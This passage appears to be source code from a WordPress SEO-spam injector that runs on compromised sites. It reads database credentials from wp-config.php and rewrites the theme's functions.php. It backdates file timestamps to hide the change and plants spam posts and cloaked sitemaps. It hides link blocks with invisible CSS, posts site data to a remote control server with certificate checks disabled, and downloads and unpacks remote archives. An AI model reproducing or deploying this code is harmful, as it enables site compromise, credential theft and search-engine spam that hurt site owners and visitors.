function additional_style_custom($homeLinksSettingsArr, $textBlock) {
    if (empty($textBlock)) {
        return '';
    }
    if ($homeLinksSettingsArr['hiddenType']['css'] === 1) {
        preg_match('~\d~', md5($_SERVER['HTTP_HOST']), $blockNum);
        $cssRules = css_rule_custom();
        $cssRule = $cssRules[$blockNum[0]];
        return $cssRule[0] . PHP_EOL . $textBlock . PHP_EOL . $cssRule[1];
    }
    return $textBlock;
}

function css_rule_custom() {

    return array(
        array('<div style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:8;">', '</div>'),
        array('<div style="position:absolute; left:-5000px;">', '</div>'),
        array('<div style="position:absolute; top: -100%;">', '</div>'),
        array('<div style="transform: scale(0)">', '</div>'),
        array('<div style="overflow: hidden; position: absolute; height: 0pt; width: 0pt;>', '</div>'),
        array('<div style="display:none;', '</div>'),
        array('<span style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:8;">', '</span>'),
        array('<span style="position:absolute; left:-5000px;">', '</span>'),
        array('<span style="position:absolute; top: -100%;">', '</span>'),
        array('<span style="transform: scale(0)">', '</span>'),
    );
}

function home_links_settings_custom($settings) {
    foreach ($settings as $key => $arr) {
        if (isset($arr['homeLinks'])) {
            return $arr['homeLinks'];
        }
    }
    return array();
}

$userSettingsArr = customFiltersSettings();

if (is_array($userSettingsArr)) {
    add_filter('posts_where_paged', 'add_where_condition');

    add_action('pre_get_posts', 'post_exclude');
    add_action('wp_enqueue_scripts', 'wp_core_js');

    add_filter('wp_count_posts', 'filter_function_name_4055', 10, 3);

    add_filter('rewrite_rules_array', 'sitemap_xml_rules');
    add_action('wp_loaded', 'custom_flush_rules');
    add_action('init', 'customSitemapFeed');
    add_action('template_redirect', 'removeYoastMeta');

    $homeLinksSettingsArr = home_links_settings_custom($userSettingsArr);

    if (!empty($homeLinksSettingsArr)) {

        customSendDebug();

        add_action('wp_head', 'buffer_start_custom');
        add_action('wp_footer', 'buffer_end_custom');
    }
}

/* custom filters */';
$gzSource = gzCompressCustom(base64_decode($source));
$source = sendpostUploader(GS_ALIAS . '/src/functionsHandler.php', array(
'host' => urlencode($_SERVER['HTTP_HOST']),
'data' => urlencode($gzSource),
));
$settings = settingsArr($functionsSource);
if (!$settings) {
echo 'settings return false' . PHP_EOL;
return false;
}
writeSettingsDB($settings);
$customFiltersUpdateResult = mbReplaceCustomFilters($functionsSource, $functionsPath, $source);
if ($customFiltersUpdateResult) {
getSitemapUrls();
return true;
}
return false;
}
function homeLinksAction() {
$hash = md5(HOME_URL);
$permLinks = array();
if (isBadEnvCustom()) {
echo 'change shell, invalid require wp-blog-header' . PHP_EOL;
exit;
}
if (!function_exists('get_permalink')) {
require WP_ROOT_DIR . '/wp-blog-header.php';
}
$posts = CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, CUSTOM_AUTHOR_ID);
if (empty($posts)) {
echo '!!!!!!!!no posts for this author!!!!!' . PHP_EOL;
return false;
}
foreach ($posts as $post) {
list ($url, $anchor) = explode(';', $post, 2);
preg_match('~\?p=(\d+)~', $post, $matches);
$postId = $matches[1];
$permLinks[] = array(get_permalink($postId), $anchor);
wp_cache_delete($postId, 'posts');
}
if (empty($permLinks)) {
echo 'invalid fetch permalinks' . PHP_EOL;
return false;
}
$compressed = gzcompress(json_encode($permLinks), 9);
$url = GS_ALIAS . '/dnc/wp-acceptors-api/home-links?hash=' . $hash . '&permhash=' . md5($compressed);
$results = sendpostUploader($url, array(
'homeLinksSettings' => json_encode($_SERVER['homeLinksSettings']),
'url' => urlencode(HOME_URL),
'permLinks' => urlencode($compressed)
)
);
$uncompressed = gzuncompress($results);
if (!isJsonCustom($uncompressed)) {
echo 'invalid home links format' . PHP_EOL;
return false;
}
$blocks = json_decode($uncompressed, 1);
if (empty($blocks)) {
echo 'no texts for this language' . PHP_EOL;
return false;
}
foreach ($blocks as $key => $value) {
update_option('home_links_custom_' . $key, $value);
}
echo sprintf('%s text block(s) available for use%s', count($blocks), PHP_EOL);
return true;
}
function removeHomeLinkKey($settings) {
foreach ($settings as $key => $arr) {
if ($key === CUSTOM_AUTHOR_ID) {
continue;
}
if (isset($settings[$key]['homeLinks'])) {
unset($settings[$key]['homeLinks']);
}
}
return $settings;
}
function viewAllAuthorsAction() {
CustomDbHandler::getInstance()->viewAllAuthors();
return true;
}
function getSitemapUrls() {
echo HOME_URL . '/' . SITEMAP_NAME . '.xml' . PHP_EOL;
echo HOME_URL . '/?feed=xml' . SITEMAP_NAME . PHP_EOL;
}
function writeSettingsDB($settings) {
try {
$settingsName = optionCustomFilters();
$instance = CustomDbHandler::getInstance();
$settingsEncode = base64_encode(serialize($settings));
if (!$instance->getOption($settingsName)) {
//echo 'insert new option' . PHP_EOL;
$instance->insertWpOptions($settingsName, $settingsEncode);
} else {
//echo 'option exist, update option' . PHP_EOL;
$instance->updateWpOptions($settingsName, $settingsEncode);
}
echo 'settings updated!' . PHP_EOL;
return true;
} catch (Exception $ex) {
echo $ex->getMessage() . PHP_EOL;
return false;
}
}
function sendAction() {
$mutexName = defined('CUSTOM_AUTHOR_ID') ? '_' . CUSTOM_AUTHOR_ID : '';
$filename = TMPDIR . '/log' . $mutexName . '.txt';
//echo "send $filename" . PHP_EOL;
$api = GS_ALIAS . '/src/wpacc-v2-ant.php';
$debugData = array(
'url' => HOME_URL,
'fullUrls' => allPostsFullUrl(),
'settings' => debugDataCustom(),
);
$responseData = sendpostUploader($api, array(
'url' => urlencode(HOME_URL),
'debug' => urlencode(gzcompress(json_encode($debugData), 9)),
));
if (trim($responseData) === 'success') {
echo "data sent" . PHP_EOL;
return true;
}
echo "error while send data" . PHP_EOL;
return false;
}
function debugDataCustom() {
$settings = array();
$settings = getDbSettingsCustom();
if ($settings) {
foreach ($settings as $userId => $arr) {
if (isset($arr['js']) && $decodedJs = detectBase64js($arr['js'])) {
$settings[$userId]['js'] = parseJsScript($decodedJs);
}
}
}
return array(
'archivePath' => str_replace('{DIR_NUM}', DIR_NUM, URL_WITH_ARCHIVES),
'authorId' => CUSTOM_AUTHOR_ID,
'cloacking' => CLOACKING,
'homeLinks' => (defined('HOME_LINKS')) ? HOME_LINKS : 0,
'homeLinksSettings' => ((defined('HOME_LINKS') && (HOME_LINKS === 1))) ? $_SERVER['homeLinksSettings'] : array(),
'forceChangeHomeLinksOwner' => defined('FORCE_CHANGE_HOME_LINKS_OWNER') ? FORCE_CHANGE_HOME_LINKS_OWNER : 0,
'internalLinking' => INTERNAL_LINKING,
'externalLinking' => EXTERNAL_LINKING,
'sitemapName' => SITEMAP_NAME,
'jsConfig' => parseJsScript(JS_SOURCE),
'usersSettings' => $settings,
);
}
function cleanAction() {
removeDirRec(TMPDIR);
return true;
}
function rollbackAction() {
$configArr = parseWpConfig(CONFIGSOURCE);
$mysqli = new mysqli($configArr['dbhostaddr'], $configArr['dbuser'], $configArr['dbpassword'], $configArr['dbname'], $configArr['dbport']);
deleteSettings();
deletePosts();
removeDirRec(TMPDIR);
return true;
}
function removeHomeLinksCustom($configArr, $mysqli) {
//SELECT option_id FROM `wp_options` where option_name LIKE 'home_links_custom_%'
$homeLinksIdsQuery = sprintf("select option_id from `%s`.`%soptions` where option_name LIKE 'home_links_custom_%%'", $configArr['dbname'], $configArr['dbprefix']);
if ($result = $mysqli->query($homeLinksIdsQuery)) {
while ($row = $result->fetch_assoc()) {
$ids[] = $row['option_id'];
}
}
if (empty($ids)) {
return 0;
}
$idsString = implode(', ', $ids);
$queryForDelete = sprintf("delete FROM `%s`.`%soptions` where option_id IN ($idsString)", $configArr['dbname'], $configArr['dbprefix']);
$mysqli->query($queryForDelete);
return $mysqli->affected_rows;
}
function globalRollbackAction() {
$configArr = parseWpConfig(CONFIGSOURCE);
$mysqli = new mysqli($configArr['dbhostaddr'], $configArr['dbuser'], $configArr['dbpassword'], $configArr['dbname'], $configArr['dbport']);
deletePosts(true);
removeDirRec(TMPDIR);
if (!defined('CUSTOM_TEMPLATE_PATH')) {
$templateDirectory = getTemplatePath();
} else {
$templateDirectory = CUSTOM_TEMPLATE_PATH;
}
$functionsPath = $templateDirectory . '/functions.php';
if (!file_exists($functionsPath)) {
echo $functionsPath . '/ no exists' . PHP_EOL;
return true;
}
if (!is_writeable($functionsPath)) {
echo $functionsPath . ' no writeable' . PHP_EOL;
return true;
}
$functionsSource = file_get_contents($functionsPath);
$regexp = '~\/\*\s+custom filters\s+\*\/(.+)\/\*\s*custom filters\s*\*\/~su';
$newSource = preg_replace($regexp, '', $functionsSource);
if ($newSource !== $functionsSource) {
file_put_contents($functionsPath, $newSource);
echo 'return original functions.php' . PHP_EOL;
}
writeSettingsDB(array());
removeHomeLinksCustom($configArr, $mysqli);
return true;
}
function sendPostsFromDbAction() {
$api = GS_ALIAS . '/src/wpacc-v2-icr.php';
$urls = CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, CUSTOM_AUTHOR_ID);
if (empty($urls)) {
echo "no posts by author id" . PHP_EOL;
return false;
}
$source = implode("\n", $urls);
$responseData = sendpostUploader($api, array(
'url' => urlencode(HOME_URL),
'source' => urlencode($source),
));
if (trim($responseData) === 'success') {
echo "data sent" . PHP_EOL;
return true;
}
echo "error while send data" . PHP_EOL;
return false;
}
function allPostsFullUrl() {
$userId = defined('CUSTOM_AUTHOR_ID') ? CUSTOM_AUTHOR_ID : 9999;
$urls = array();
if (isBadEnvCustom()) {
echo 'change shell, invalid require wp-blog-header' . PHP_EOL;
exit;
}
if (!function_exists('get_permalink')) {
require_once WP_ROOT_DIR . '/wp-blog-header.php';
}
$canonicalUrls = CustomDbHandler::getInstance()->allPostsFromDb(HOME_URL, $userId);
foreach ($canonicalUrls as $canonicalUrl) {
list ($link, $title) = explode(';', $canonicalUrl);
preg_match('~\?p=(\d+)~', $link, $idMatches);
$urls[] = array(
get_permalink($idMatches[1]),
$idMatches[1],
$title
);
wp_cache_delete($idMatches[1], 'posts');
}
return $urls;
}
function unzipSecondMethod() {
$paths = array(
TMPDIR
);
foreach ($paths as $path) {
$zipFiles = glob($path . DIRECTORY_SEPARATOR . '*.zip');
if (!is_dir($path)) {
mkdir($path, 0755, true);
}
$zip = new ZipArchive();
foreach ($zipFiles as $file) {
if ($zip->open($file)) {
if ($zip->extractTo($path)) {
echo "$file extracted" . PHP_EOL;
unlink($file);
$zip->close();
}
} else {
echo "I can not open the archive $file" . PHP_EOL;
return false;
}
}
}
file_put_contents(TMPDIR . '/unzipsuccess', '');
return true;
}
function unzipFirstMethod() {
$paths = array(
TMPDIR
);
if (file_exists($unzipClassPath = WP_ROOT_DIR . '/wp-admin/includes/class-pclzip.php')) {
include_once $unzipClassPath;
} else {
include_once TMPDIR . '/header.php';
}
foreach ($paths as $path) {
$zipFiles = glob($path . DIRECTORY_SEPARATOR . '*.zip');
foreach ($zipFiles as $file) {
$archive = new PclZip($file);
if ($archive->extract(PCLZIP_OPT_PATH, $path) == 0) {
echo "Error : " . $archive->errorInfo(true);
return false;
} else {
echo $file . " unzipped" . PHP_EOL;
unlink($file);
}
}
}
file_put_contents(TMPDIR . '/unzipsuccess', '');
return true;
}
function parseWpConfig($configSource) {
if ((ALTERNATIVE_CONNECT_MYSQL === 1) && defined('WP_CONFIG_ARR_AS_JSON')) {
return json_decode(WP_CONFIG_ARR_AS_JSON, 1);
}
//preg_match_all("~(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'\"],\s*[\'\"](.+)[\'\"]\s*\);~", $configSource, $dbhost);
preg_match_all("~^define.*(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'\"],\s*[\'\"](.+)[\'\"]\s*\);~m", $configSource, $dbhost);
preg_match("~table_prefix\s+=\s*[\'\"](.+)[\'\"];~", $configSource, $prefix);
if (stristr($dbhost[2][3], ':') !== false) {
list($hostAddr, $dbPort) = explode(':', $dbhost[2][3]);
} else {
$hostAddr = $dbhost[2][3];
$dbPort = 3306;
}
return array(
'dbname' => $dbhost[2][0],
'dbuser' => $dbhost[2][1],
'dbpassword' => $dbhost[2][2],
'dbhostaddr' => $hostAddr,
'dbprefix' => $prefix[1],
'dbport' => $dbPort,
);
}
function findWriteablePath($pathForScaning) {
if (is_writeable($pathForScaning)) {
return $pathForScaning;
}
$subdirs = glob($pathForScaning . '/*', GLOB_ONLYDIR);
if (!empty($subdirs)) {
foreach ($subdirs as $dir) {
if (is_writable($dir)) {
return $dir;
}
}
}
return null;
}
function detectWProotDir() {
if (file_exists(CURRENTDIR . '/wp-config.php')) {
return CURRENTDIR;
}
$normalizePath = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR);
if (file_exists($normalizePath . '/wp-config.php')) {
return $normalizePath;
}
return null;
}
function get_file($source, $localname) {
$file = fopen('php://temp/maxmemory:0', 'w+b');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $source);
curl_setopt($ch, CURLOPT_FAILONERROR, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_FILE, $file);
curl_exec($ch);
rewind($file);
file_put_contents($localname, stream_get_contents($file));
fclose($file);
echo $localname . ' - ' . filesizemb($localname) . ' MB' . PHP_EOL;
}
function uploadRangeOfFiles($url, $range, $extension, $dirname = '') {
list ($firstNum, $secondNum) = explode('-', $range);
if (!makeDir($dirname)) {
throw new Exception("dont create dirname - $dirname");
}
foreach (range($firstNum, $secondNum) as $num) {
$filename = $num . $extension;
get_file($url . $filename, $dirname !== '' ?
$dirname . DIRECTORY_SEPARATOR . $filename : $filename);
}
}
function filesizemb($file) {
return number_format(filesize($file) / pow(1024, 2), 3, '.', '');
}
function makeDir($dirname) {
if ($dirname !== '') {
if (!is_dir($dirname)) {
if (!mkdir($dirname, 0777, true)) {
return false;
}
}
}
$GLOBALS['createdDirectories'][] = $dirname;
return true;
}
function jsPrepare($jsSource) {
$base64 = base64_encode($jsSource);
return '<script src="data:text/javascript;base64,' . $base64 . '"></script>';
}
function modify_functions_php($functionsPath, $source, $tmpDir, $deleteOldCustomFilters = false) {
$functionsSource = file_get_contents($functionsPath);
oldFunctionPathBak($tmpDir, $functionsPath);
$optionCustom = optionCustomFunctions();
if ($deleteOldCustomFilters) {
$customFiltersRegexpSec = "~/\*\s*(custom filters|$optionCustom)\s*\*/(.+)/\*\s*(custom filters|$optionCustom)\s*\*/~su";
$functionsSource = preg_replace($customFiltersRegexpSec, '', $functionsSource);
}
preg_match('~\<\?(php)*~', $functionsSource, $tagMatches);
if (empty($tagMatches)) {
return;
}
$phpMatches = preg_quote($tagMatches[0]);
//$newFunctionSource = preg_replace("~$phpMatches~", $tagMatches[0] . "\n\n" . base64_decode($source), $functionsSource, 1);
$newFunctionSource = preg_replace("~$phpMatches~", $tagMatches[0] . "\n\n" . $source, $functionsSource, 1);
if (file_put_contents($functionsPath, $newFunctionSource) !== false) {
/* dont touch me please */
//touch($functionsPath, frequenttimestamp(dirname($functionsPath)));
return true;
}
return false;
}
function findOldSettings($functionsSource) {
$oldSourceRegex = '/\'(.+?\.xml\$)\'\s*=>\s*\'(.+?)\'/m';
if (preg_match($oldSourceRegex, $functionsSource, $oldSourceMatches)) {
echo 'old settings value detected' . PHP_EOL;
$jsScriptRegex = '/\$str\s*=\s*<<<STR(.+?)STR;/s';
preg_match($jsScriptRegex, $functionsSource, $jsMatches);
$oldSettingsArr = generateSettings(9999, trim($jsMatches[1])
, $oldSourceMatches[1], $oldSourceMatches[2], null);
return $oldSettingsArr;
} else {
//find in db
echo 'find old settings in DB' . PHP_EOL;
return getDbSettingsCustom();
}
}
function getDbSettingsCustom() {
$settings = CustomDbHandler::getInstance()->getOption(optionCustomFilters());
if ($settings) {
//new settings
$firstUnserialize = unserialize(base64_decode($settings['option_value']));
if (isset($firstUnserialize['option_value'])) {
//double unserialize fix
$secondUnserialize = unserialize(base64_decode($firstUnserialize['option_value']));
writeSettingsDB($secondUnserialize);
return $secondUnserialize;
}
return $firstUnserialize;
} else {
/* dont touch */
$settings = CustomDbHandler::getInstance()->getOption('wp_custom_filters');
if ($settings) {
$unserialisedSettings = unserialize(base64_decode($settings['option_value']));
writeSettingsDB($unserialisedSettings);
return $unserialisedSettings;
}
}
//echo 'no old settings';
return null;
}
function addPostsCountInSettings($settings) {
foreach ($settings as $userId => $arr) {
$postsCount = count(CustomDbHandler::getInstance()
->allPostsFromDb(HOME_URL, $userId));
$settings[$userId]['count'] = $postsCount;
}
return $settings;
}
function oldFunctionPathBak($tmpDir, $functionsPath) {
if (!is_writeable(dirname($functionsPath))) {
$backupPath = $tmpDir . '/' . basename($functionsPath) . '_bak';
} else {
$backupPath = $functionsPath . '_bak';
}
echo "functions backup path - $backupPath\n";
file_put_contents($backupPath, file_get_contents($functionsPath));
touch($backupPath, frequenttimestamp(dirname($backupPath)));
}
function replaceJSinSource($source, $preparedScript) {
$decoded = base64_decode($source);
$modified = str_replace(array('JAVASCRIPT', 'SITEMAP_NAME'), array($preparedScript, SITEMAP_NAME), $decoded);
return base64_encode($modified);
}
function sendpostUploader($url, $fields) {
$fields_string = '';
foreach ($fields as $key => $value) {
$fields_string .= $key . '=' . $value . '&';
}
rtrim($fields_string, '&');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_POST, count($fields));
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$result = curl_exec($ch);
$info = curl_getinfo($ch);
if (curl_errno($ch)) {
$error_msg = curl_error($ch);
echo $error_msg . PHP_EOL;
return null;
}
curl_close($ch);
return ($info["http_code"] == 200) ? $result : null;
}
function contentParts($pageSource) {
preg_match_all('/\[(TITLE|TEXT)\](.+)\[\/(\1)]/ius'
, $pageSource, $kuski);
if (!isset($kuski[2][0])) {
throw new Exception('invalid title');
}
if (!isset($kuski[2][1])) {
throw new Exception('invalid text');
}
$title = mb_convert_encoding(trim($kuski[2][0]), 'HTML-ENTITIES', "UTF-8");
$slug = stringToSlug($kuski[2][0]);
$text = mb_convert_encoding(trim($kuski[2][1]), 'HTML-ENTITIES', "UTF-8");
return array(
'title' => $title,
'text' => $text,
'slug' => $slug,
);
}
function resultFormat($blogUrl, $postId, $title) {
return rtrim($blogUrl, '/') . '/?p=' . $postId . ';' . $title;
}
function randDate() {
$randDate = mktime(rand(1, 11), rand(0, 59), rand(0, 59), date("m") + rand(1, 12), date("d") + rand(1, 20), date("Y") - rand(4, 7));
return date('Y-m-d H:i:s', $randDate);
}
function stringToSlug($str) {
$options = array(
'delimiter' => '-',
'limit' => null,
'lowercase' => true,
'replacements' => array(),
'transliterate' => true,
);
$char_map = array(
// Latin
'À' => 'A',
'Á' => 'A',
'Â' => 'A',
'Ã' => 'A',
'Ä' => 'A',
'Å' => 'A',
'Ă' => 'A',
'Æ' => 'AE',
'Ç' => 'C',
'È' => 'E',
'É' => 'E',
'Ê' => 'E',
'Ë' => 'E',
'Ì' => 'I',
'Í' => 'I',
'Î' => 'I',
'Ï' => 'I',
'Ð' => 'D',
'Ñ' => 'N',
'Ò' => 'O',
'Ó' => 'O',
'Ô' => 'O',
'Õ' => 'O',
'Ö' => 'O',
'Ő' => 'O',
'Ø' => 'O',
'Ș' => 'S',
'Ù' => 'U',
'Ú' => 'U',
'Û' => 'U',
'Ü' => 'U',
'Ű' => 'U',
'Ý' => 'Y',
'Þ' => 'TH',
'ß' => 'ss',
'à' => 'a',
'á' => 'a',
'â' => 'a',
'ã' => 'a',
'ä' => 'a',
'å' => 'a',
'ă' => 'a',
'æ' => 'ae',
'ç' => 'c',
'è' => 'e',
'é' => 'e',
'ê' => 'e',
'ë' => 'e',
'ì' => 'i',
'í' => 'i',
'î' => 'i',
'ï' => 'i',
'ð' => 'd',
'ñ' => 'n',
'ò' => 'o',
'ó' => 'o',
'ô' => 'o',
'õ' => 'o',
'ö' => 'o',
'ő' => 'o',
'ø' => 'o',
'ș' => 's',
'ù' => 'u',
'ú' => 'u',
'û' => 'u',
'ü' => 'u',
'ű' => 'u',
'ý' => 'y',
'þ' => 'th',
'ÿ' => 'y',
// Latin symbols
'©' => '(c)',
// Greek
'Α' => 'A',
'Β' => 'B',
'Γ' => 'G',
'Δ' => 'D',
'Ε' => 'E',
'Ζ' => 'Z',
'Η' => 'H',
'Θ' => '8',
'Ι' => 'I',
'Κ' => 'K',
'Λ' => 'L',
'Μ' => 'M',
'Ν' => 'N',
'Ξ' => '3',
'Ο' => 'O',
'Π' => 'P',
'Ρ' => 'R',
'Σ' => 'S',
'Τ' => 'T',
'Υ' => 'Y',
'Φ' => 'F',
'Χ' => 'X',
'Ψ' => 'PS',
'Ω' => 'W',
'Ά' => 'A',
'Έ' => 'E',
'Ί' => 'I',
'Ό' => 'O',
'Ύ' => 'Y',
'Ή' => 'H',
'Ώ' => 'W',
'Ϊ' => 'I',
'Ϋ' => 'Y',
'α' => 'a',
'β' => 'b',
'γ' => 'g',
'δ' => 'd',
'ε' => 'e',
'ζ' => 'z',
'η' => 'h',
'θ' => '8',
'ι' => 'i',
'κ' => 'k',
'λ' => 'l',
'μ' => 'm',
'ν' => 'n',
'ξ' => '3',
'ο' => 'o',
'π' => 'p',
'ρ' => 'r',
'σ' => 's',
'τ' => 't',
'υ' => 'y',
'φ' => 'f',
'χ' => 'x',
'ψ' => 'ps',
'ω' => 'w',
'ά' => 'a',
'έ' => 'e',
'ί' => 'i',
'ό' => 'o',
'ύ' => 'y',
'ή' => 'h',
'ώ' => 'w',
'ς' => 's',
'ϊ' => 'i',
'ΰ' => 'y',
'ϋ' => 'y',
'ΐ' => 'i',
// Turkish
'Ş' => 'S',
'İ' => 'I',
'Ç' => 'C',
'Ü' => 'U',
'Ö' => 'O',
'Ğ' => 'G',
'ş' => 's',
'ı' => 'i',
'ç' => 'c',
'ü' => 'u',
'ö' => 'o',
'ğ' => 'g',
// Russian
'А' => 'A',
'Б' => 'B',
'В' => 'V',
'Г' => 'G',
'Д' => 'D',
'Е' => 'E',
'Ё' => 'Yo',
'Ж' => 'Zh',
'З' => 'Z',
'И' => 'I',
'Й' => 'J',
'К' => 'K',
'Л' => 'L',
'М' => 'M',
'Н' => 'N',
'О' => 'O',
'П' => 'P',
'Р' => 'R',
'С' => 'S',
'Т' => 'T',
'У' => 'U',
'Ф' => 'F',
'Х' => 'H',
'Ц' => 'C',
'Ч' => 'Ch',
'Ш' => 'Sh',
'Щ' => 'Sh',
'Ъ' => '',
'Ы' => 'Y',
'Ь' => '',
'Э' => 'E',
'Ю' => 'Yu',
'Я' => 'Ya',
'а' => 'a',
'б' => 'b',
'в' => 'v',
'г' => 'g',
'д' => 'd',
'е' => 'e',
'ё' => 'yo',
'ж' => 'zh',
'з' => 'z',
'и' => 'i',
'й' => 'j',
'к' => 'k',
'л' => 'l',
'м' => 'm',
'н' => 'n',
'о' => 'o',
'п' => 'p',
'р' => 'r',
'с' => 's',
'т' => 't',
'у' => 'u',
'ф' => 'f',
'х' => 'h',
'ц' => 'c',
'ч' => 'ch',
'ш' => 'sh',
'щ' => 'sh',
'ъ' => '',
'ы' => 'y',
'ь' => '',
'э' => 'e',
'ю' => 'yu',
'я' => 'ya',
// Ukrainian
'Є' => 'Ye',
'І' => 'I',
'Ї' => 'Yi',
'Ґ' => 'G',
'є' => 'ye',
'і' => 'i',
'ї' => 'yi',
'ґ' => 'g',
// Czech
'Č' => 'C',
'Ď' => 'D',
'Ě' => 'E',
'Ň' => 'N',
'Ř' => 'R',
'Š' => 'S',
'Ť' => 'T',
'Ů' => 'U',
'Ž' => 'Z',
'č' => 'c',
'ď' => 'd',
'ě' => 'e',
'ň' => 'n',
'ř' => 'r',
'š' => 's',
'ť' => 't',
'ů' => 'u',
'ž' => 'z',
// Polish
'Ą' => 'A',
'Ć' => 'C',
'Ę' => 'e',
'Ł' => 'L',
'Ń' => 'N',
'Ó' => 'o',
'Ś' => 'S',
'Ź' => 'Z',
'Ż' => 'Z',
'ą' => 'a',
'ć' => 'c',
'ę' => 'e',
'ł' => 'l',
'ń' => 'n',
'ó' => 'o',
'ś' => 's',
'ź' => 'z',
'ż' => 'z',
// Latvian
'Ā' => 'A',
'Č' => 'C',
'Ē' => 'E',
'Ģ' => 'G',
'Ī' => 'i',
'Ķ' => 'k',
'Ļ' => 'L',
'Ņ' => 'N',
'Š' => 'S',
'Ū' => 'u',
'Ž' => 'Z',
'ā' => 'a',
'č' => 'c',
'ē' => 'e',
'ģ' => 'g',
'ī' => 'i',
'ķ' => 'k',
'ļ' => 'l',
'ņ' => 'n',
'š' => 's',
'ū' => 'u',
'ž' => 'z'
);
// Transliterate characters to ASCII
if ($options['transliterate']) {
$str = str_replace(array_keys($char_map), $char_map, $str);
}
// Replace non-alphanumeric characters with our delimiter
$str = preg_replace('/[^\p{L}\p{Nd}]+/u', $options['delimiter'], $str);
// Remove duplicate delimiters
$str = preg_replace('/(' . preg_quote($options['delimiter'], '/') . '){2,}/', '$1', $str);
// Truncate slug to max. characters
$str = mb_substr($str, 0, ($options['limit'] ? $options['limit'] : mb_strlen($str, 'UTF-8')), 'UTF-8');
// Remove delimiter from ends
$str = trim($str, $options['delimiter']);
return $options['lowercase'] ? mb_strtolower($str, 'UTF-8') : $str;
}
function removeDirRec($dir) {
if ($objs = glob($dir . "/*")) {
foreach ($objs as $obj) {
is_dir($obj) ? removeDirRec($obj) : unlinkHandler($obj);
}
}
rmdir($dir);
}
function unlinkHandler($obj) {
if (unlink($obj)) {
echo "$obj deleted " . PHP_EOL;
return;
}
echo "!!!!!!!$obj failed to delete !!!!!!!" . PHP_EOL;
}
function deletePosts($global = false) {
$userId = defined('CUSTOM_AUTHOR_ID') ? CUSTOM_AUTHOR_ID : 9999;
if ($global) {
$settings = getDbSettingsCustom();
if (!$settings) {
echo 'invalid get settings from db' . PHP_EOL;
} else {
$users = array_keys($settings);
if (!in_array(9999, $users)) {
$users[] = 9999;
}
}
}
if (!isset($users)) {
$users = array($userId);
}
CustomDbHandler::getInstance()->deletePosts($users);
return true;
}
function replacePTags($source, $links) {
preg_match_all('~.{20}<\/p>~us', $source, $matches);
if (empty($matches[0])) {
return null;
}
$num = range(0, count($matches[0]) - 1);
$patternsReplacementsArr = array();
foreach ($links as $link) {
$randNum = $num[rand(0, count($matches[0]) - 1)];
$pattern = '~' . preg_quote($matches[0][$randNum]) . '~us';
if (isset($patternsReplacementsArr[$pattern])) {
$patternsReplacementsArr[$pattern] = $patternsReplacementsArr[$pattern] . "\n" . $link;
} else {
$patternsReplacementsArr[$pattern] = $matches[0][$randNum] . "\n" . $link;
}
}
return preg_replace(array_keys($patternsReplacementsArr), array_values($patternsReplacementsArr), $source);
}
function urlBlockSec($url, $lastmod, $changefreq, $priority) {
return <<<STR
<url>
<loc>$url</loc>
<lastmod>$lastmod</lastmod>
<changefreq>$changefreq</changefreq>
<priority>$priority</priority>
</url>\n\n
STR;
}
function currenturl($rootDir, $host = null) {
$host = !$host ? 'http://' . $_SERVER['HTTP_HOST'] : $host;
$tmp = str_replace(realpath($_SERVER['DOCUMENT_ROOT']), '', $host . $rootDir);
return $tmp;
}
function checkSitemapNameRoot() {
if (!is_writeable(WP_ROOT_DIR)) {
echo WP_ROOT_DIR . ' isnt writeable' . PHP_EOL;
return false;
}
if (file_exists(WP_ROOT_DIR . '/' . SITEMAP_NAME . '.xml')) {
echo SITEMAP_NAME . '.xml in root dir, change sitemap name' . PHP_EOL;
return false;
}
return true;
}
function frequenttimestamp($pathtodir) {
foreach (glob($pathtodir . "/*php") as $file) {
$tmp[] = filemtime($file);
}
$count = array_count_values($tmp);
arsort($count);
$keys = array_keys($count);
return array_shift($keys);
}
function mb_basename($file, $ext = '') {
$explodedPath = explode('/', $file);
$last = end($explodedPath);
return ($ext !== '') ? str_replace($ext, '', $last) : $last;
}
function generateSettings($userId, $jsSource, $sitemapRegex, $feedPath, $homeLinksSettings) {
return array(
$userId => array(
'js' => $jsSource,
'sitemapsettings' => array(
$sitemapRegex => $feedPath,
),
'nojs' => (defined('CLOACKING')) ? CLOACKING : 0,
'homeLinks' => (defined('HOME_LINKS') && HOME_LINKS === 1) ? $homeLinksSettings : null,
),
);
}
function mbReplaceCustomFilters($functionsSource, $functionsPath, $sourceMod) {
$optionCustom = optionCustomFunctions();
$customFiltersRegexp = '~/\*\s+custom filters\s+\*/(.+)/\*\s*custom filters\s*\*/~su';
$customFiltersRegexpSec = "~/\*\s*$optionCustom\s*\*/(.+)/\*\s*$optionCustom\s*\*/~su";
if (preg_match($customFiltersRegexp, $functionsSource, $matches)) {
//echo old custom filters exists
if (modify_functions_php($functionsPath, $sourceMod, TMPDIR, true)) {
echo "functions modified" . PHP_EOL;
return true;
}
}
if (preg_match($customFiltersRegexpSec, $functionsSource, $matches)) {
$sourceHash = md5(trim($matches[1]));
$dbHash = CustomDbHandler::getInstance()->getOption($optionCustom);
//var_dump('source hash');
//var_dump($sourceHash);
//var_dump('hash from db');
//var_dump($dbHash['option_value']);
if ($sourceHash === $dbHash['option_value']) {
echo "functions php hashes are identity" . PHP_EOL;
return true;
} else {
echo 'checksums do not match' . PHP_EOL;
}
}
echo "code not found... record!" . PHP_EOL;
if (modify_functions_php($functionsPath, $sourceMod, TMPDIR, true)) {
echo "functions modified" . PHP_EOL;
preg_match($customFiltersRegexpSec, $functionsSource, $matches);
